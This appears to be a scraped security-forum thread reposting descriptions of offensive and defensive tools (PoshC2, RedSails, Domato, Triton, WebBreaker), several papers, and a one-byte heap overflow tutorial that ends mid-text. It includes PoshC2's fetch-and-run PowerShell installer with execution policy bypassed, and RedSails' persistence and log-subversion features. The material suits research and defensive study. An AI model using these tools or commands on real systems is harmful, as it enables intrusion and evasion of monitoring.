PoshC2 PoshC2 is a proxy aware C2 framework written completely in PowerShell to aid penetration testers with red teaming, post-exploitation and lateral movement. The tools and modules were developed off the back of our successful PowerShell sessions and payload types for the Metasploit Framework. PowerShell was chosen as the base language as it provides all of the functionality and rich features required without needing to introduce multiple languages to the framework. Find us on #Slack - poshc2.slack.com Requires only Powershell v2 on both server and client C2 Server Implant Handler Quick Install powershell -exec bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/nettitude/PoshC2/master/C2-Installer.ps1')" Team Server Create one PoshC2 team server and allow multiple red teamers to connect using the C2 Viewer and Implant Handler Wiki: For more info see the GitHub Wiki Welcome to the PoshC2 wiki page Sursa: https://github.com/nettitude/PoshC2
-
Abstract—With the rise of attacks using PowerShell in the recent months, there has not been a comprehensive solution for monitoring or prevention. Microsoft recently released the AMSI solution for PowerShell v5, however this can also be bypassed. This paper focuses on repurposing various stealthy runtime .NET hijacking techniques implemented for PowerShell attacks for defensive monitoring of PowerShell. It begins with a brief introduction to .NET and PowerShell, followed by a deeper explanation of various attacker techniques, which is explained from the perspective of the defender, including assembly modification, class and method injection, compiler profiling, and C based function hooking. Of the four attacker techniques that are repurposed for defensive real-time monitoring of PowerShell execution, intermediate language binary modification, JIT hooking, and machine code manipulation provide the best results for stealthy run-time interfaces for PowerShell scripting analysis. Download: https://arxiv.org/pdf/1709.07508.pdf
-
Redsails About A post-exploitation tool capable of: maintaining persistence on a compromised machine subverting many common host event logs (both network and account logon) generating false logs / network traffic Based on [PyDivert] (https://github.com/ffalcinelli/pydivert), a Python binding for WinDivert, a Windows driver that allows user-mode applications to capture/modify/drop network packets sent to/from the Windows network stack. Built for Windows operating systems newer than Vista and Windows 2008 (including Windows 7, Windows 8 and Windows 10). Dependencies Redsails has dependencies PyDivert and WinDivert. You can resolve those dependencies by running: pip install pydivert pip install pbkdf2 Pycrypto is also needed. easy_install pycrypto Pycrypto may have a dependency on [Microsoft Visual C++ Compiler for Python 2.7] (http://aka.ms/vcpython27) Usage Server (victim host you are attacking) redSails.py Or if the victim does not have python installed, you can run provided exe (or compile your own! instructions below) `redSails.exe Client (attacker) redSailsClient.py <ip> <port> Creating an executable To compile an exe (for deployment) inlieu of the python script, you will need pyinstaller: pip install pyinstaller Then you can create the exe: pyinstaller-script.py -F --clean redSails.spec License Copyright (C) 2017 Robert J. McDown, Joshua Theimer This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see http://www.gnu.org/licenses/. Sursa: https://github.com/BeetleChunks/redsails
-
Abstract—Developing an approach to test cryptographic hash function implementations can be particularly difficult, and bugs can remain unnoticed for a very long time. We revisit the NIST SHA-3 hash function competition, and apply a new testing strategy to all available reference implementations. Motivated by the cryptographic properties that a hash function should satisfy, we develop four types of tests. The Bit-Contribution Test checks if changes in the message affect the hash value, and the Bit-Exclusion Test checks that changes beyond the last bit of the message leave the hash value unchanged. We develop the Metamorphic Update Test to verify that messages are processed correctly in chunks, and then use combinatorial testing methods to reduce the test set size by several orders of magnitude while retaining the same fault detection capability. Our tests detect bugs in 41 of the 86 reference implementations submitted to the SHA-3 competition, including the rediscovery of a bug in all submitted implementations of the SHA-3 finalist BLAKE. This bug remained undiscovered for seven years, and is particularly serious because it provides a simple strategy to modify the message without changing the hash value that is returned by the implementation. We will explain how to detect this type of bug, using a simple and fully-automated testing approach. Download: https://eprint.iacr.org/2017/891.pdf
-
Domato A DOM fuzzer Written and maintained by Ivan Fratric, ifratric@google.com Copyright 2017 Google Inc. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Usage To generate a single .html sample run: python generator.py <output file> To generate multiple samples with a single call run: python generator.py --output_dir <output directory> --no_of_files <number of output files> The generated samples will be placed in the specified directory and will be named as fuzz-<number>.html, e.g. fuzz-1.html, fuzz-2.html etc. Generating multiple samples is faster because the input grammar files need to be loaded and parsed only once. Code organization generator.py contains the main script. It uses grammar.py as a library and contains additional helper code for DOM fuzzing. grammar.py contains the generation engine that is mostly application-agnostic and can thus be used in other (i.e. non-DOM) generation-based fuzzers. As it can be used as a library, its usage is described in a separate section below. .txt files contain grammar definitions. There are 3 main files, html.txt, css.txt and js.txt which contain HTML, CSS and JavaScript grammars, respectively. These root grammar files may include content from other files. Using the generation engine and writing grammars To use the generation engine with a custom grammar, you can use the following python code from grammar import Grammar my_grammar = Grammar() my_grammar.ParseFromFile('input_file.txt') result_string = my_grammar.GenerateSymbol('symbol_name') The following sections describe the syntax of the grammar files. Basic syntax Domato is based on an engine that, given a context-free grammar in a simple format specified below, generates samples from that grammar. A grammar is described as a set of rules in the following basic format <symbol> = a mix of constants and <other_symbol>s Each grammar rule contains a left side and the right side separated by the equal character. The left side contains a symbol, while the right side contains the details on how that symbol may be expanded. When expanding a symbol, all symbols on the right-hand side are expanded recursively while everything that is not a symbol is simply copied to the output. Note that a single rule can't span over multiple lines of the input file. Consider the following simplified example of a part of the CSS grammar: <cssrule> = <selector> { <declaration> } <selector> = a <selector> = b <declaration> = width:100% If we instruct the grammar engine to parse that grammar and generate 'cssrule', we may end up with either a { width:100% } or b { width:100% } Note there are two rules for the 'selector' symbol. In such cases, when the generator is asked to generate a 'selector', it will select the rule to use at random. It is also possible to specify the probability of the rule using the 'p' attribute, for example <selector p=0.9> = a <selector p=0.1> = b In this case, the string 'a' would be output more often than 'b' There are other attributes that can be applied to symbols in addition to the probability. Those are listed in a separate section. Consider another example for generating html samples <html> = <lt>html<gt><head><body><lt>/html<gt> <head> = <lt>head<gt>...<lt>/head<gt> <body> = <lt>body<gt>...<lt>/body<gt> Note that since the '<' and '>' have a special meaning in the grammar syntax, so here we are using <lt> and <gt>instead. These symbols are built in and don't need to be defined by the user. A list of all built-in symbols is provided in a separate section. Generating programming language code To generate programming language code, a similar syntax can be used, but there are a couple of differences. Each line of the programming language grammar is going to correspond to the line of the output. Because of that, the grammar syntax is going to be more free-form to allow expressing constructs in various programming languages. Secondly, when a line is generated, in addition to outputting the line, one or more variables may be created and those variables may be reused when generating other lines. Again, let's take a look of the simplified example: !varformat fuzzvar%05d !lineguard try { <line> } catch(e) {} !begin lines <new element> = document.getElementById("<string min=97 max=122>"); <element>.doSomething(); !end lines If we instruct the engine to generate 5 lines, we may end up with something like try { var00001 = document.getElementById("hw"); } catch(e) {} try { var00001.doSomething(); } catch(e) {} try { var00002 = document.getElementById("feezcqbndf"); } catch(e) {} try { var00002.doSomething(); } catch(e) {} try { var00001.doSomething(); } catch(e) {} Note that programming language lines are enclosed in '!begin lines' and '!end lines' statement. This gives the grammar parser the necessary information that the lines inbetween are programming language lines and are thus parsed differently. We used <new element> instead of <element>. This instructs the generator to create a new variable of type 'element' instead of generating the 'element' symbol. <string> is one of the built-in symbols so no need to define it. [optional] You can use !varformat statement to define the format of variables you want to use [optional] You can use !lineguard statement to define additional code that gets inserted around every line in order to catch exceptions or perform other tasks. This is so you wouldn't need to write it for every line separately. In addition to '!begin lines' and '!end lines' you can also use '!begin helperlines' and '!end helperlines' to define lines of code that will only ever be used if required when generating other lines (for example, helper lines might generate variables needed by the 'main' code, but you don't ever want those helper lines to end up in the output when they are not needed). Comments Everythng after the first '#' character on the line is considered a comment, so for example #This is a comment Preventing infinite recursions The grammar syntax has a way of telling the fuzzer which rules are nonrecursive and can be safe to use even if the maximum level of recursion has been reached. This is done with the ‘nonrecursive’ attributes. An example is given below. !max_recursion 10 <test root=true> = <foobar> <foobar> = foo<foobar> <foobar nonrecursive> = bar Firstly, an optional ‘!max_recursion’ statement defines the maximum recursion depth level (50 by default). Notice that the second production rule for ‘foobar’ is marked as non-recursive. If ever the maximum recursion level is reached the generator will force using the non-recursive rule for ‘foobar’ symbol, thus preventing infinite recursion. Including and importing other grammar files In Domato, including and importing grammars are two different context. Including is simpler. You can use !include other.txt to include rules from other.txt into the currently parsed grammar. Importing works a bit differently !import other.txt tells the parser to create a new Grammar() object that can then be referenced from the current grammar by using the special <import> symbol, for example like this: <cssrule> = <import from=css.txt symbol=rule> You can think about importing and including in terms of namespaces: !include will put the included grammar into the single namespace, while !import will create a new namespace which can then be accessed using the <import>symbol and the namespace specified via the 'from' attribute. Including Python code Sometimes you might want to call custom Python code in your grammar. For example, let’s say you want to use the engine to generate a http response and you want the body length to match the 'Size' header. Since this is something not possible with normal grammar rules, you can include custom Python code to accomplish it like this: !begin function savesize context['size'] = ret_val !end function !begin function createbody n = int(context['size']) ret_val = 'a' * n !end function <foo root> = <header><cr><lf><body> <header> = Size: <int min=1 max=20 beforeoutput=savesize> <body> = <call function=createbody> The python functions are defined between ‘!begin function <function_name>’ and ‘!end function’ commands. The functions can be called in two ways: using ‘beforeoutput’ attribute and using symbol. By specifying the ‘beforeoutput’ attribute in some symbol, the corresponding function will be called when this symbol is expanded, just before the result of the expansion is output to the sample. The expansion result will be passed to the function in the ret_val variable. The function is then free to modify ret_val, store it for later use or perform any other operations. When using a special <call> symbol, the function (specified in a ‘function’ attribute) will be called when the symbol is encountered during language generation. Any value stored by the function in ret_val will be considered the result of the expansion (ret_val gets included in the sample). Your python code has access to the following variables: context - a dictionary that is passed through the whole sample generation. You can use it to store values (such as storing the size in an example above) and retrieve them in the rules that fire subsequently. attributes - a dictionary corresponding to the symbol currently being processed. You can use it to pass parameters to your functions. For example if you used something like to call your function attributes[‘foo’] will be set to ‘bar’. ret_val - The value that will be output as a result of the function call. It is initialized to an empty value when using symbol to call a function, otherwise it will be initialized to the value generated by the symbol. Built-in symbols The following symbols have a special meaning and should not be redefined by users: <lt> - ‘<’ character <gt> - ‘>’ character <hash> - ‘#’ character <cr> - CR character <lf> - LF character <space> - space character <tab> - tab character <ex> - ‘!’ character <char> - can be used to generate an arbitrary ascii character using ‘code’ attribute. For example <char code=97> corresponds to ‘a’. Generates random character if not specified. Supports ‘min’ and ‘max’ attribute. <hex> - generates a random hex digit <int>, <int 8>, <uint8>, <int16>, <uint16>, <int32>, <uint32>, <int64>, <uint64> - can be used to generate random integers. Supports ‘min’ and ‘max’ attribute that can be used to limit the range of integers that will be generated. Supports the ‘b’ and ‘be’ attribute which makes the output binary in little/big endian format instead of text output. <float>, <double> - generates a random floating-point number. Supports ‘min’ and ‘max’ attribute (0 and 1 if not specified). Supports ‘b’ attribute which makes the output binary. <string> - generates a random string. Supports ‘min’ and ‘max’ attributes which control the minimum and maximum charcode generated as well as ‘minlength’ and ‘maxlength’ attributes that control the length of the string <lines> - outputs the given number (via ‘count’ attribute) lines of code. See the section on generating programming language code for example. <import> - imports a symbol from another grammar, see the section on including external grammars for details. <call> - calls a user-defined function corresponding to the function attribute. See the section on including Python code in the grammar for more info. Symbol attributes The following attributes are supported: root - marks a symbol as the root symbol of the grammar. The only supported value is ‘true’. When GenerateSymbol() is called, if no argument is specified, the root symbol will be generated. nonrecursive - gives the generator a hint that this rule doesn’t contain recursion loops and is used to prevent infinite recursions. The only supported value is ‘true’. new - used when generating programming languages to denote that a new variable is created here rather than expanding the symbol as usual. The only supported value is ‘true’. from, symbol - used when importing symbols from other grammars, see ‘Including external grammars’ section. count - used in lines symbol to specify the number of lines to be created. id - used to mark that several symbols should share the same value. For example in the rule ‘doSomething(<int id=1>, <int id=1>)’ both ints would end up having the same value. Only the first instance is actually expanded, the second is just copied from the first. min, max - used in generation of numeric types to specify the minimum and maximum value. Also used to limit the set of characters generated in strings. b, be - used in numeric types to specify binary little-endian (‘b’) or big-endian (‘be’) output. code - used in char symbol to specify the exact character to output by its code. minlength, maxlength - used when generating strings to specify the minimum and maximum length. up - used in hex symbol to specify uppercase output (lowercase is the default). function - used in the <call> symbol, see ‘Including Python code’ section for more info. beforeoutput - used to call user-specified functions, see ‘Including Python Bug Showcase Some of the bugs that have been found with Domato: Apple Safari: CVE-2017-2369, CVE-2017-2373, CVE-2017-2362, CVE-2017-2454, CVE-2017-2455, CVE-2017-2459, CVE-2017-2460, CVE-2017-2466, CVE-2017-2471, CVE-2017-2476, CVE-2017-7039, CVE-2017-7040, CVE-2017-7041, CVE-2017-7042, CVE-2017-7043, CVE-2017-7046, CVE-2017-7048, CVE-2017-7049 Google Chrome: Issues 666246 and 671328 Microsoft Internet Explorer 11: CVE-2017-0037, CVE-2017-0059, CVE-2017-0202, CVE-2017-8594 Microsoft Edge: CVE-2017-0037, CVE-2017-8496, CVE-2017-8652, CVE-2017-8644 Mozilla Firefox: CVE-2017-5404, CVE-2017-5447, CVE-2017-5465 Disclaimer This is not an official Google product. Sursa: https://github.com/google/domato
-
INTRO Global Proxy App for Android System ProxyDroid is distributed under GPLv3 with many other open source software, here is a list of them: cntlm - authentication proxy: http://cntlm.sourceforge.net/ redsocks - transparent socks redirector: http://darkk.net.ru/redsocks/ netfilter/iptables - NAT module: http://www.netfilter.org/ transproxy - transparent proxy for HTTP: http://transproxy.sourceforge.net/ stunnel - multiplatform SSL tunneling proxy: http://www.stunnel.org/ TRAVIS CI STATUS Nightly Builds PREREQUISITES JDK 1.6+ Maven 3.0.5 Android SDK r17+ Android NDK r8+ Local Maven Dependencies Use Maven Android SDK Deployer to install all android related dependencies. git clone https://github.com/mosabua/maven-android-sdk-deployer.git pushd maven-android-sdk-deployer export ANDROID_HOME=/path/to/android/sdk mvn install -P 4.1 popd BUILD Invoke the building like this mvn clean install Sursa: https://github.com/madeye/proxydroid
-
- 1
-
-
Subgraph OS: Adversary resistant computing platform Subgraph OS is a desktop computing and communications platform that is designed to be resistant to network-borne exploit and malware attacks. It is also meant to be familiar and easy to use. Even in alpha, Subgraph OS looks and feels like a modern desktop operating system. Subgraph OS includes strong system-wide attack mitigations that protect all applications as well as the core operating system, and key applications are run in sandbox environments to reduce the impact of any attacks against applications that are successful. Subgraph OS was designed to reduce the risks in endpoint systems so that individuals and organizations around the world can communicate, share, and collaborate without fear of surveillance or interference by sophisticated adversaries through network borne attacks. Subgraph OS is designed to be difficult to attack. This is accomplished through system hardening and proactive, ongoing research on defensible system design. CLICK TO EXPLORE SUBGRAPH OS Hardened kernel built with grsecurity, PaX, and RAP Subgraph OS includes a kernel hardened with the well-respected grsecurity/PaX patchset for system-wide exploit and privilege escalation mitigation. In addition to making the kernel more resistant to attacks, grsecurity and PaX security features offer strong security protection to all processes running without modification (i.e. recompiling / relinking). The Subgraph OS kernel is also built with the recently released RAP (demo from the test patch) security enhancements designed to prevent code-reuse (i.e. ROP) attacks in the kernel. This is an important mitigation against contemporary exploitaion techniques and greatly increases the resistance of the kernel to modern exploits that can be used to escalate privileges once an application on the endpoint is breached. grsecurity, PaX, and RAP are essential defenses implemented in Subgraph OS. The Subgraph OS kernel (4.9) is also built with fewer features to the extent possible producing a widely-usable desktop operating system. This is done to proactively reduce kernel attack surface. INFORMATION ABOUT THE SUBGRAPH OS KERNEL Sandboxed applications Subgraph OS runs exposed or vulnerable applications in sandbox environments. This sandbox framework, known as Oz, unique to Subgraph OS, is designed to isolate applications from each other and the rest of the system. Access to system resources are only granted to applications that need them. For example, the PDF viewer and the image viewer do not have access to any network interface in the sandbox they're configured to run in. The technologies underlying Oz include Linux namespaces, restricted filesystem environments, desktop isolation, and seccomp bpf to reduce kernel attack surface through system call whitelists. Subgraph is regularly instrumenting applications and libraries to limit the exposed kernel API to what is necessary for each sandboxed application to function. Many applications only need about one-third to one-half of the available system calls to function, and the Subgraph Oz sandbox framework ensures that the unnecessary system calls cannot be invoked (Oz can and often does restrict system calls to specific known parameters to further narrow kernel attack surface through system calls such as ioctl(2)). Subgraph OS will soon be using gosecco, a new library for seccomp-bpf that lets policies be expressed in a format that is more efficient, cross-platform, and understandable to humans. Sandboxed applications include: Web browser Email client with built-in support for encryption CoyIM instant messenger LibreOffice productivity suite PDF viewer Image viewer Video player Hexchat SANDBOX TECHNICAL WALKTHROUGH Memory Safety Most custom code written for Subgraph OS is written in Golang, which is a memory safe language. Golang libraries are also often implemented in pure Golang, which is in contrast to other popular languages such as Python. While the Python runtime may be memory safe, the C languages wrapped by so many of the commonly used libraries expose tools written in Python to the same old memory corruption vulnerabilities. Application firewall Subgraph also includes an application firewall that will detect and alert the user to unexpected outbound connections by applications. The Subgraph application firewall is fairly unique to Linux-based operating systems and is an area of ongoing development. MORE SCREENSHOTS OF SUBGRAPH OS Other security features Subgraph OS is constantly improving and hardening the default security state of the operating system. This includes making configuration enhancements and adding entirely new mitigations. Additional security features in Subgraph OS include: AppArmor profiles covering many system utilities and applications Security event monitor and desktop notifications (coming soon) Roflcoptor tor control port filter service Port to new seccomp-bpf golang library Gosecco Hardened Subgraph OS is based on a foundation designed to be resistant to attacks against operating systems and the applications they run. MORE Anonymized Subgraph OS includes built-in Tor integration, and a default policy that sensitive applications only communicate over the Tor network. MORE Secure communication Subgraph OS ships with a new, more secure IM client, and an e-mail client configured by default for PGP and Tor support. MORE Alpha release availability Try the Subgraph OS Alpha today. You can install it on a computer, run it as a live-disk, or use it in a VM. TRY SUBGRAPH OS ALPHA Sursa: https://subgraph.com/index.en.html
- 1 reply
-
- 1
-
-
MacOS host monitoring - the open source way Michael George Derbycon 2017 MacOS host monitoring - the open source way, I will talk about a example piece of malware(Handbrake/Proton) and how you can use open source tooling detection tooling to do detection and light forensics. Since I will be talking about the handbrake malware, I will also be sharing some of the TTPs the malware used if you want to find this activity in your fleet. Dropbox - Security Engineer. I work on the Incident Response team at Dropbox. I primarily work on host-based detection systems. Sursa: http://www.irongeek.com/i.php?page=videos/derbycon7/s30-macos-host-monitoring-the-open-source-way-michael-george
-
Stealing Windows Credentials Using Google Chrome Author/Researcher: Bosko Stankovic (bosko defensecode.com) http://www.defensecode.com Attacks that leak authentication credentials using the SMB file sharing protocol on Windows OS are an ever-present issue, exploited in various ways but usually limited to local area networks. One of the rare research involving attacks over the internet was recently presented by Jonathan Brossard and Hormazd Billimoria at the Black Hat security conference[1] [2] in 2015. However, there have been no publicly demonstrated SMB authentication related attacks on browsers other than Internet Explorer and Edge in the past decade. This paper describes an attack which can lead to Windows credentials theft, affecting the default configuration of the most popular browser in the world today, Google Chrome, as well as all Windows versions supporting it. Download: https://www.exploit-db.com/docs/42015.pdf
-
- 1
-
-
Triton is a dynamic binary analysis (DBA) framework. It provides internal components like a Dynamic Symbolic Execution (DSE) engine, a Taint Engine, AST representations of the x86 and the x86-64 instructions set semantics, SMT simplification passes, an SMT Solver Interface and, the last but not least, Python bindings. Based on these components, you are able to build program analysis tools, automate reverse engineering and perform software verification. As Triton is still a young project, please, don't blame us if it is not yet reliable. Open issues or pull requests are always better than troll =). A full documentation is available on our doxygen page. Quick start Description Installation Examples Presentations and Publications Internal documentation Dynamic Symbolic Execution Symbolic Execution Optimizations AST Representations of Semantics SMT Semantics Supported SMT Solver Interface SMT Simplification Passes Spread Taint Tracer Independent Python Bindings News A blog is available and you can follow us on twitter @qb_triton or via our RSS feed. Support IRC: #qb_triton@freenode Mail: triton at quarkslab com Authors Jonathan Salwan - Lead dev, Quarkslab Pierrick Brunet - Core dev, Quarkslab Florent Saudel - Core dev, Bordeaux University Romain Thomas - Core dev, Quarkslab Cite Triton @inproceedings{SSTIC2015-Saudel-Salwan, author = {Florent Saudel and Jonathan Salwan}, title = {Triton: A Dynamic Symbolic Execution Framework}, booktitle = {Symposium sur la s{\'{e}}curit{\'{e}} des technologies de l'information et des communications, SSTIC, France, Rennes, June 3-5 2015}, publisher = {SSTIC}, pages = {31--54}, year = {2015}, } Sursa: https://github.com/JonathanSalwan/Triton
-
- 2
-
-
Introduction Build functional security testing, into your software development and release cycles! WebBreaker provides the capabilities to automate and centrally manage Dynamic Application Security Testing (DAST) as part of your DevOps pipeline. WebBreaker truly enables all members of the Software Security Development Life-Cycle (SDLC), with access to security testing, greater test coverage with increased visibility by providing Dynamic Application Security Test Orchestration (DASTO). Current support is limited to the World's most popular commercial DAST product, WebInspect. System Architecture Supported Features Command-line (CLI) scan administration of WebInspect with Foritfy SSC products. Jenkins Environmental Variable & String Parameter support (i.e. $BUILD_TAG) Docker container v17.x support Custom email alerting or notifications for scan launch and completion. Extensible event logging for scan administration and results. WebInspect REST API support for v9.30 and later. Fortify Software Security Center (SSC) REST API support for v16.10 and later. WebInspect scan cluster support between two (2) or greater WebInspect servers/sensors. Capabilities for extensible scan telemetry with ELK and Splunk. GIT support for centrally managing WebInspect scan configurations. Replaces most functionality of Fortify's fortifyclient Python compatibility with versions 2.x or 3.x Provides AES 128-bit key management for all secrets from the Fernet encryption Python library. Quick Local Installation and Configurations Installing WebBreaker from source: git clone https://github.com/target/webbreaker pip install -r requirements.txt python setup.py install Configuring WebBreaker: Point WebBreaker to your WebInspect API server(s) by editing: webbreaker/etc/webinspect.ini Point WebBreaker to your Fortify SSC URL by editing: webbreaker/etc/fortify.ini SMTP settings on email notifications and a message template can be edited in webbreaker/etc/email.ini Mutually exclusive remote GIT repos created by users, are encouraged to persist WebInspect settings, policies, and webmacros. Simply, add the GIT URL to the webinspect.ini and their respective directories. NOTES: Required: As with any Python application that contains library dependencies, pip is required for installation. Optional: Include your Python site-packages, if they are not already in your $PATH with export PATH=$PATH:$PYTHONPATH. Usage WebBreaker is a command-line interface (CLI) client. See our complete WebBreaker Documentation for further configuration, usage, and installation. The CLI supports upper-level and lower-level commands with respective options to enable interaction with Dynamic Application Security Test (DAST) products. Currently, the two Products supported are WebInspect and Fortfiy (more to come in the future!!) Below is a Cheatsheet of supported commands to get you started. List all WebInspect scans: webbreaker webinspect list --server webinspect-1.example.com:8083 Query WebInspect scans: webbreaker webinspect list --server webinspect-1.example.com:8083 --scan_name important_site List with http: webbreaker webinspect list --server webinspect-1.example.com:8083 --protocol http Download WebInspect scan from server or sensor: webbreaker webinspect download --server webinspect-2.example.com:8083 --scan_name important_site_auth Download WebInspect scan as XML: webbreaker webinspect download --server webinspect-2.example.com:8083 --scan_name important_site_auth -x xml Download WebInspect scan with http (no SSL): webbreaker webinspect download --server webinspect-2.example.com:8083 --scan_name important_site_auth --protocol http Basic WebInspect scan: webbreaker webinspect scan --settings important_site_auth Advanced WebInspect Scan with Scan overrides: webbreaker webinspect scan --settings important_site_auth --allowed_hosts example.com --allowed_hosts m.example.com Scan with local WebInspect settings: webbreaker webinspect scan --settings /Users/Matt/Documents/important_site_auth Initial Fortify SSC listing with authentication (SSC token is managed for 1-day): webbreaker fortify list --fortify_user matt --fortify_password abc123 Interactive Listing of all Fortify SSC application versions: webbreaker fortify list List Fortify SSC versions by application (case sensitive): webbreaker fortify list --application WEBINSPECT Upload to Fortify SSC with command-line authentication: webbreaker fortify upload --fortify_user $FORT_USER --fortify_password $FORT_PASS --version important_site_auth Upload to Fortify SSC with interactive authentication & application version configured with fortify.ini: webbreaker fortify upload --version important_site_auth --scan_name auth_scan Upload to Fortify SSC with application/project & version name: webbreaker fortify upload --application my_other_app --version important_site_auth --scan_name auth_scan WebBreaker Console Output webbreaker webinspect scan --settings MyCustomWebInspectSetting --scan_policy Application --scan_name some_scan_name _ __ __ ____ __ | | / /__ / /_ / __ )________ ____ _/ /_____ _____ | | /| / / _ \/ __ \/ __ / ___/ _ \/ __ `/ //_/ _ \/ ___/ | |/ |/ / __/ /_/ / /_/ / / / __/ /_/ / ,< / __/ / |__/|__/\___/_.___/_____/_/ \___/\__,_/_/|_|\___/_/ Version 1.2.0 JIT Scheduler has selected endpoint https://some.webinspect.server.com:8083. WebInspect scan launched on https://some.webinspect.server.com:8083 your scan id: ec72be39-a8fa-46b2-ba79-10adb52f8adb !! Scan results file is available: some_scan_name.fpr Scan has finished. Webbreaker complete. Bugs and Feature Requests Found something that doesn't seem right or have a feature request? Please open a new issue. Copyright and License Copyright 2017 Target Brands, Inc. Licensed under MIT. Sursa: https://github.com/target/webbreaker
-
- 1
-
-
Linux Heap Exploitation Intro Series: The magicians cape – 1 Byte Overflow Reading time ~21 min Posted by javier on 20 September 2017 Categories: Heap, Heap linux, Heap overflow Intro Hello again! It’s been a while since the last blog post. This is due to not having as much time as we wanted but hopefully you all kept the pace with this heapy things as they are easy to forget due to the heavy amount of little details the heap involves. On this post we are going to demonstrate how a single byte overflow, with a user controlled value, can cause chunks to disappear for the implementation like a magician puts a cape on top of objects (chunks) and makes them disappear. The Vulnerability Preface For the second part of our series we are going for another rather common vulnerability happening out there. From my own experience, it sometimes confusing and hard to get the sizes right for elements (be it arrays, allocations, variables in general) because of the confusion between declaring “something” and actually accessing each element (i.e. byte) of that “something”. I know, sounds weird, but look at the following code: int array_of_integers[10]; // (1) int i; for (i = 1; i <= 10; i++) // (2) { array_of_integers[i] = 1; // (3) } In this code, we wanted to have an array of ten integers (1) and then iterate over the array (2) and set every element of the array to the number 1. As you might or might not know, the first element of an array is not the number one, in C, these start with zero (array_of_integers[0]). What will happen here is that when the variable i reaches 10, the code will try to write to array_of_integers[10] which is not allocated, effectively doing out-of-bounds write, exactly 4 bytes more than expected as 4 bytes is the size of an int. Also, keeping the pace up with ptmalloc2 implementation and to keep these blog posts as “fresh” and “new” as possible, here we have a fairly new exploit against SAPCAR (CVE-2017-8852) by CoreSecurity that takes advantage of a buffer overflow happening in the heap. It’s an easy and cool read! What This kind of vulnerability falls into the category of buffer overflows or out-of-bounds. Specifically in this blog post we are going to see what could happen in the case of an out-of-bounds 1 byte write. At first glance one could think there is not many possibilities on just writing one byte but, if we remember how an allocated chunk is placed into memory we begin to “believe”: +-+-+-+-+-+-+-+-+-+-+-+-+ | PREV_SIZE OR USER DATA| <-- Previous Chunk Data (OVERFLOW HERE) +-----------------+-+-+-+ <-- Chunk start | CHUNK SIZE |A|M|P| +-----------------+-+-+-+ | USER DATA | | | | - - - - - - - -| | PREV_SIZE OR USER DATA| +-----------------------+ <-- End of chunk As we can see, 1 byte overwrite will mess up the Main Arena (A), Is MMaped (M) and Previous in-use (P) bits as well as overwriting the first byte of the CHUNK SIZE. The implications of this type of vulnerability (cliché) are endless: changing the previous in-use bit leading to strange memory corruptions that when free()‘ing, maliciously crafted memory, would lead to arbitrary overwrite (overwriting pointers to functions), shrinking or growing adjacent chunks by tampering with the next chunk’s size thus leading to chunks overlapping or memory fragmentation which would lead to use-after-invalidation bugs (memory leaks, use-after-free, etc.). When stars collide one byte To prepare the scenario for this kind of vulnerability, I inspired myself heavily on the Forgotten Chunks[1] paper by Context. I took my own way in the sense that I decided to build two proof of concepts for the techniques described there as well as a challenge for you to test out! One byte write In this scenario we count with the following: There are three allocated chunks and the first of them A, is the vulnerable one to our one byte overflow. To simplify things; we can write into the first two chunks A and B but not into the third chunk C. We can read from all of them. Let’s see the initial state of the heap of this in our beloved chunky-ascii-art. +---HEAP GROWS UPWARDS | | +-+-+-+-+-+-+ | | CHUNK A | <-- Read/Write | +-----------+ | | CHUNK B | <-- Read/Write | +-----------+ | | CHUNK C | <-- Read | +-----------+ | | TOP | | | | V | | +-----------+ Our goal is to write into chunk C. To do so we would need the following to happen. 1 – Previous to any overflows and to prevent memory corruptions because we are going to overflow into chunk B, the first thing to make happen is to free() chunk B. +---HEAP GROWS UPWARDS | | +-+-+-+-+-+-+ | | CHUNK A | <-- Read/Write | +-----------+ | | FREE B | | +-----------+ | | CHUNK C | <-- Read | +-----------+ | | TOP | | | | V | | +-----------+ 2 – Now that chunk B is free, we are going to trigger the one byte overflow that is present in chunk A and overflow one byte into chunk B. This will change the first byte of chunk’s B size – in our case, we will make it grow. Let’s say that our chunks are of the following sizes: A(0x100-WORD_SIZE), B(0x100-WORD_SIZE), C(0x40-WORD_SIZE) Let me state that WORD_SIZE is a variable that will be 8 on 64bit systems and 4 on 32bit systems. This was already explained in the Painless Intro to ptmalloc2 blog post but again: This WORD_SIZE is subtracted from the size we actually want because it is the size that the chunk’s size header will take in memory so, to keep the chunks within the size we expect (0x100 or 0x40) we subtract the size header’s size (WORD_SIZE) to prevent padding to the next WORD_SIZE*2 size. I know this is too condensed but it is a must to be able to understand this to proceed. By now we can see where all this goes, right? That’s it, we are about to overwrite chunk’s B size to make it be as big enough to have B+C size. So, we know that B is 0x100 and C is 0x40, then let me ask you a question: With which byte would we need to overflow A so that it puts it into B‘s size to completely overlap C on a 64bit system? a) 0x40 0x41 c) 0x48 That’s right, none of them. We shouldn’t be choosing values ending in zero or an even number because all of these, in binary, translate to leaving the last bit unset. This means that the PREV_INUSE bit will be set to zero creating a memory corruption in some cases as chunk A is not really free. That leaves 0x40 and 0x48 out. If you have chosen 0x48, you might know the reason why 0x41 is not valid to completely overlap C: Because we need to add 8 bytes due to C‘s size header length placed just after B. The right answer is 0x51 as it keeps the PREV_INUSE bit set and is the next 16 byte padded size to 0x40. Enough chit-chat, but it was necessary. Remember that B is free()‘d, so B->fd and B->bk (pointers to next’s and previous free chunks if any) are set as well as the next’s chunk (C) PREV_SIZE: -=Data gets populated from right to left and from top to bottom=- +-----------------+-+-+-+ |CHUNK A SIZE = \x01\x01| <-- Size 0x100 + 0x1 (PREV_INUSE bit) +-----------------+-+-+-+ |x51\x51\x51\x51\x51\x51| |x51\x51\x51\x51\x51\x51| |x51\x51\x51\x51\x51\x51| |x51\x51\x51\x51\x51\x51| +-----------------+-+-+-+ |FREE B SIZE = \x01\x51| <-- Size Overflown 0x151 +-----------------+-+-+-+ |B->fd = main_arena->TOP| |B->bk = main_arena->TOP| +-----------------------+ |PREV_SIZE 